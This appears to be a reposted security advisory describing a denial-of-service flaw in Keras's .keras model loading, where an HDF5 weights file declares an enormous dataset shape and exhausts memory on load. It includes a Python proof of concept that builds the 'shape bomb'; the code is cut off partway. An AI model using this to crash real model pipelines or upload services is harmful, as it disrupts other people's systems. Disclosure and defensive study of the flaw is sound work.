CVE-2026-0897 - Keras vulnerable to DoS via Malicious .keras Model (HDF5 Shape Bomb Causes Petab
CVE-2026-0897 - Keras vulnerable to DoS via Malicious .keras Model (HDF5 Shape Bomb Causes Petab
GHSA-mgx6-5cf9-rr43 HIGH pip/keras
CVE: CVE-2026-0897
Summary
Keras’s model loader (KerasFileEditor) unsafely loads user-supplied .keras model files containing HDF5-based weight files without performing any validation on HDF5 dataset metadata. An attacker can craft a .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape (e.g. (50_000_000, 50_000_000)), but stores only a few bytes. The .keras file remains small (100–400 KB) because HDF5 with gzip compression stores minimal data. During model loading,
Keras executes:
`python
result[key] = value[()] # loads entire dataset into memory`
value[()] instructs h5py to allocate RAM proportional to the dataset’s declared shape – in this case 8.88 PiB of memory. This results in: Immediate memory exhaustion Python / TensorFlow crashes Jupyter kernel kill System instability Full Denial of Service on any workload that processes untrusted .keras models This allows an attacker to crash any environment or pipeline that loads .keras models, including MLOps backends, training services, model upload endpoints, or automated pipelines.
Proof of Concept
// PoC.py
import zipfile
import io
import h5py
import numpy as np
from keras.saving import KerasFileEditor
# Create a malicious .keras model containing a massive HDF5 shape bomb
def create_malicious_keras(path="bomb.keras"):
hdf5_bytes = io.BytesIO()
# Create an HDF5 file with a huge declared dataset shape
with h5py.File(hdf5_bytes, "w") as f:
d = f.create_dataset(
"payload",
shape=(50_000_000, 50_000_000), # Extremely large shape → petabytes on load
dtype="float32",
compression="gzip",
compression_opts=9
)
# Write minimal data so the file stays very small
d[0:1, 0:1] = np.zeros((1, 1), dtype=np.float32)
hdf5_bytes.seek(0)
# Build a valid .keras archive structure
with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as z:
z.writestr("config.json", "{}📌 来源: GitHub-Advisory | 🆔 CVE-2026-0897 | 📅 2026-05-06